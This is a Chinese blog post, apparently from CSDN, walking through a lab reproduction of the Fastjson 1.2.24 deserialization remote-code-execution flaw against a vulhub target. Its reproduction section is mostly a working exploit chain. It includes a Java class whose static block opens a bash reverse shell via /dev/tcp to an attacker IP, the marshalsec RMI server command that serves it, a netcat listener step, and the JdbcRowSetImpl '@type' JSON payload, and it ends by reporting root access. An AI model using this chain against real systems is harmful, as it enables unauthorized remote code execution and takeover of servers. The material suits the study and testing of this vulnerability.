Fastjson 1.2.24反序列化漏洞

已于 2023-01-19 18:46:45 修改
阅读量565 收藏 2
点赞数
分类专栏: 漏洞复现 文章标签: json java
于 2023-01-04 15:01:12 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_51151498/article/details/128382837
版权

Fastjson简介

Fastjson 是阿里巴巴公司开源的一款 JSON 解析器,它可以解析 JSON 格式的字符串, 支持将 Java Bean 序列化为 JSON 字符串,也可以从 JSON 字符串反序列化到 Java Bean 。

漏洞原理

fastjson在解析json对象时,会使用autoType实例化某一个具体的类,并调用set/get方法访问属性。漏洞出现在Fastjson autoType处理json对象时,没有对@type字段进行完整的安全性验证,我们可以传入危险的类并调用危险类连接远程RMI服务器,通过恶意类执行恶意代码,进而实现远程代码执行漏洞。

影响版本:fastjson < 1.2.25

Fastjson识别

报错识别

打开代理,使用burp suite抓包

修改请求为POST

将:Content-Type:修改为application/json

 fastjson 1.2.24及以下版本,报错信息不会出现alibaba.fastjson的字样

报错请求返回,会出现alibaba.fastjson,表示为:fastjson框架  

JNDI

JNDI(The Java Naming and Directory Interface,Java命名和目录接口)是一组在Java应用中访问命名 和目录服务的API,命名服务将名称和对象联系起来,使得我们可以用名称访问对象。

可以访问以下命名/目录服务:

RMI (JAVA远程方法调用)
LDAP (轻量级目录访问协议)
CORBA (公共对象请求代理体系结构)

DNS (域名服务)

漏洞复现

攻击机:kali      

靶    机:vulhub

1.启动靶场

 2.访问靶场

3. 创建一个空文件,命名为TouchFile.java,写入以下代码

// javac TouchFile.java
import java.lang.Runtime;
import java.lang.Process;
 
public class TouchFile {
    static {
        try {
            Runtime rt = Runtime.getRuntime();
            String[] commands = {"/bin/bash","-c","bash -i >& /dev/tcp/172.16.115.152/2022 0>&1"};
            Process pc = rt.exec(commands);
            pc.waitFor();
        } catch (Exception e) {
            // do nothing
        }
    }
}

4.编译.java文件,生成.class文件

javac TouchFile.java

5.在当下目录开启web服务,有条件的使用vps

6. 下载 marshalsec 搭建一个RMI服务器,进行远程加载payload

marshalsec 下载地址

下载完成后,进入 “marshalsec” 目录执行编译命令。

mvn clean package -DskipTests

编译时间比较长,应该和网速有关。

看到以下界面,表示编译成功

编译成功以后会在,target目录下生成marshalsec-0.0.3-SNAPSHOT-all.jar文件

7.开启RMI服务

 java -cp marshalsec-0.0.3-SNAPSHOT-all.jar marshalsec.jndi.RMIRefServer "http://172.16.115.152:8000/#TouchFile" 9999

#红色部分为:你的IP和刚才开启web服务的端口号

 8.nc开启监听

端口号为:TouchFile.java文件中的端口号

 9.使用burp拦截靶场请求,抓包后改GET包为POST包,输入以下payload:

{
    "b":{
        "@type":"com.sun.rowset.JdbcRowSetImpl",
        "dataSourceName":"rmi://192.168.6.134:9999/TouchFile",
        "autoCommit":true
    }
 
}

右键修改为POST请求

 将Content-Type: application/x-www-form-urlencoded

修改为:Content-Type: application/json

点击send发送

 10.反弹shell

获得root权限

参考链接:

Fastjson 1.2.24反序列化漏洞复现_景天zy的博客-CSDN博客_vulhub-fastjson1,2,24

- Time
关注
  • 0
    点赞
  • 2
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
反序列化FastJson1.2.24 反序列化漏洞解析(CVE-2017-18349)
Continuejww的博客
09-17 304
基于Vulhub平台完整复现+CVE-2017-18349复现+注意事项。
fastjson反序列化-1.2.24漏洞利用与分析
hackzkaq的博客
01-24 964
Fastjson1.2.24版本是最先发现漏洞的版本,这篇文章也是作为学习Fastjson反序列化的开端。后续会继续学习Fastjson高版本的绕过。反序列化之路任重而道远。申明:本账号所分享内容仅用于网络安全技术讨论,切勿用于违法途径,所有渗透都需获取授权,违者后果自行承担,与本号及作者无关,请谨记守法。免费领取安全学习资料包!渗透工具技术文档、书籍面试题帮助你在面试中脱颖而出视频基础到进阶。
fastjson 1.2.24 反序列化导致任意命令执行漏洞(CVE-2017-18349)
qq_51163834的博客
06-24 786
fastjsonjava的一个库,可以将java对象转化为json格式的字符串,也可以将json格式的字符串转化为java对象。
Fastjson 1.2.24 反序列化漏洞研究
辛勤搬砖的门卫的专栏
01-05 1164
Fastjson 反序列化漏洞
Fastjson反序列化漏洞(1.2.24 RCE)
m0_61506558的博客
09-13 3039
Fastjson是一个JSON工具库,它的作用就是把java对象转换为json形式,也可以用来将json转换为java对象。@type引入这个功能的目的是在序列化的时候防止子类中包含接口或抽象类的时候,类型丢失,这样我们在反序列化的时候就不需要再指定类名。
Fastjson 1.2.24反序列化漏洞复现
m0_54899775的博客
01-16 4482
Fastjson 1.2.24反序列化漏洞复现 创建文件,反弹shell
Fastjson 1.2.47反序列化漏洞复现
m0_54899775的博客
03-16 3363
Fastjson 1.2.47反序列化漏洞复现
Fastjson反序列化漏洞史1
08-03
然而,Fastjson在过去的几年里曾曝出一系列的反序列化漏洞,这些漏洞可能被攻击者利用,执行任意代码,从而对系统安全构成威胁。 在2020年5月8日的分析中,文章提到了Fastjson反序列化漏洞的历史,并对一些关键的...
fastjson1.2.24反序列化RCE
06-24
**Fastjson 1.2.24 反序列化远程代码执行漏洞详解** 在Java开发中,Fastjson是一个广泛使用的高性能JSON库,它提供了一种快速解析和生成JSON的机制。然而,像许多处理序列化和反序列化的库一样,Fastjson在某些版本...
Fastjson各版本反序列化EXP 1.2.24 1.2.41 1.2.42 1.2.43 1.2.45 48 62 66
03-29
# Fastjson反序列化漏洞为例 1、此时/tmp目录 ![img]...
fastjson1.2.24含源码
02-04
《深入解析Fastjson 1.2.24Fastjson是阿里巴巴开发的一款高性能的Java JSON库,它具有极快的性能,广泛的功能以及简洁易用的API,使其在Java社区中广受欢迎。Fastjson 1.2.24版本是其发展过程中的一个重要里程碑...
fastjson 1.2.24反序列化漏洞
weixin_68547367的博客
01-04 1223
fastjson是一个Java语言编写的高性能且功能完善的JSON库,它采用一种“假定有序快速匹配”的算法,把JSON Parse的性能提升到了极致,它的接口简单易用,已经被广泛使用在缓存序列化,协议交互,Web输出等各种应用场景中。在网络传输的过程中,RMI中的对象是通过序列化方式进行编码传输的,这意味着,RMI在接收到经过序列化编码的对象后进行反序列化java.io.Serializable:表示序列化,是一个空接口,也就是说这个接口没有声明任何的方法,所以实现这个接口的类也就不需要实现任何的方法。
13-java安全——fastjson1.2.24反序列化TemplatesImpl利用链分析
网络安全
08-27 2709
漏洞环境: fastjson1.2.24 jdk1.7.80 新建一个maven项目在pom.xml文件中引入fastjson的依赖: <dependency> <groupId>com.alibaba</groupId> <artifactId>fastjson</artifactId> <version>1.2.24</v
【vulhub漏洞复现】Fastjson 1.2.24反序列化漏洞
RexHa的博客
03-06 3661
Fastjson 是一个 Java 库,可以将 Java 对象转换为 JSON 格式,也可以将 JSON 字符串转换为 Java 对象。 漏洞成因: 目标网站在解析 json 时,未对 json 内容进行验证,直接将 json 解析成 java 对象并执行,攻击者构造对应的 payload ,让系统执行,就能达到代码执行,甚至命令执行的目的。
[Vulfocus解题系列]fastjson1.2.24反序列化RCE (CVE-2017-18349)
00勇士王子的博客
03-22 5702
前言 Fastjson 是一个 Java 库,可以将 Java 对象转换为 JSON 格式,当然它也可以将 JSON 字符串转换为 Java 对象。Fastjson 可以操作任何 Java 对象,即使是一些预先存在的没有源码的对象。 Fastjson1.2.24版本爆出了第一个反序列化漏洞。第一个Fastjson反序列化漏洞爆出后,阿里在1.2.25版本设置了autoTypeSupport属性默认为false,并且增加了checkAutoType()函数,通过黑白名单的方式来防御Fastjson反序列化漏洞
fastjson-1.2.24漏洞,搭建及复现,手把手图文教程
芜湖~米汤来喽~
10-04 1405
【代码】fastjson-1.2.24漏洞,搭建及复现,手把手图文教程。
fastjsonfastjson 1.2.24 反序列化导致任意命令执行
bqnagus
10-01 855
fastjsonfastjson 1.2.24 反序列化导致任意命令执行
Python应用爬虫下载QQ音乐歌曲!
最新发布
Python_trys的博客
07-12 690
12345678910111213141516171819202122232425262728293031323334353637383940414243444546474849505152535455565758596061626364656667686970。
fastjson反序列化漏洞复现过程
04-19
根据提供的引用内容,fastjson反序列化漏洞是一种安全漏洞,攻击者可以利用该漏洞在目标系统上执行恶意代码。下面是fastjson反序列化漏洞的复现过程[^1][^2]: 1. 判断是否使用Fastjson以及Fastjson版本:首先需要...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值